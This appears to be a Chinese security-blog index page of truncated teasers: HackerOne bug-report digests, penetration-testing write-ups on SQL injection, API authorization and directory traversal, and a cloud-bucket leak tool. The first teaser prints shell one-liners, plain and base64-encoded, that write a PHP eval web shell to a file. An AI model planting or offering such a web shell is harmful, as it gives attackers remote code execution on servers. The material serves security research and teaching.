直接echo写入webshell： echo '<?php eval($_POST[1]); ?>' > 1.php base64写入webshell echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==' | base64 -d >1.php 重定向符号被转义时用ba...

现在很多网站都是通过卖VIP会员盈利的，为了让用户更有购买欲望，有的时候会把内容展示一小部分，然后隐藏绝大多部分，让你看完一点还想看就忍不住付钱了：），产品经理的愿景是很美好的，但是...

现在好多应用都通过API接口对外提供服务 如果鉴权做的不好的话，很容易出现未授权访问漏洞 通过BurpJSLinkFinder或findsomething很容易获取到接口信息 下面以某SRC API接口测试的一个小案例进行...

漏洞报告 Gitlab #1113289 Guest users can create new test cases #475098 A profile page of a user can be denied from loading by appending .html to the username #1192460 A deactivated...

漏洞报告 【Zivver】在 AndroidManifest 中启用 ADB 备份 http://hackerone.com/reports/1225158 【LINE】 不正确的授权允许在通知通道服务器中泄露用户的通知数据 http://hackerone.com/report...

漏洞报告 【Internet Bug Bounty 4,000 USD】Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 http://hackerone.com/reports/1394916 【Rockset】Failure to I...

漏洞报告 【Localize 50刀】文档名处的存储xss http://hackerone.com/reports/1321407 【Tor】Tor Browser using --log or --verbose logs the exact connection time a client connects to any...

漏洞报告 【MTN Group】表单重复提交 http://hackerone.com/reports/1165223 【MTN Group】XSS漏洞 http://hackerone.com/reports/1091165 【Mail.ru】通过类创建对话框导致存储型XSS http://ha...

http://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools 文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除

前言 由于小程序的便捷性，越来越多的应用迁移到了了小程序上，由此伴随着小程序上线前的日常渗透测试工作也开始增加。但小程序的测试中经常会遇到数据包被加密了，导致无法进行改包测试。和测...

前言 上篇已经发了一篇回显型SQL注入，SQL剩下的还有报错型、盲注，今天再记一下报错型的流程，仅做参考 正文 1.先通过引号 判断该网站为数字型，payload直接拼接，无需引号闭合，当网站后直接...

漏洞报告 JNDI 反击——H2 数据库控制台中未经身份验证的 RCE http://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/ 挖洞技巧 通过嵌套解析器条件对 XSS ...

漏洞报告 【Reddit】用户名密码暴力破解 http://hackerone.com/reports/1165225 【Reddit】密码重置没有速率限制会导致电子邮件枚举 http://hackerone.com/reports/1425884 【Proctorio】通用跨...

0x01正文 打开网站 先用7kb扫一波目录 哦吼，发现了一堆的目录遍历(绿色的都是)。 这里一个 Log目录十分的显眼，很有可能造成log泄露 okey，如我所料。收获了一个通用中危洞√ 27450-kwvsjna88f...

漏洞报告 【MCUboot】private keys exposed on the GitHub repository http://hackerone.com/reports/1234531 【XVIDEOS】CSRF on delete friend requests - Not protected with CSRF Token htt...

漏洞报告 【U.S. Dept Of Defense】重定向+反射型XSS http://hackerone.com/reports/1406598 【Mail.ru 】#1257091 Угон домена photo-test.gb.ru (возможно) http://hackero...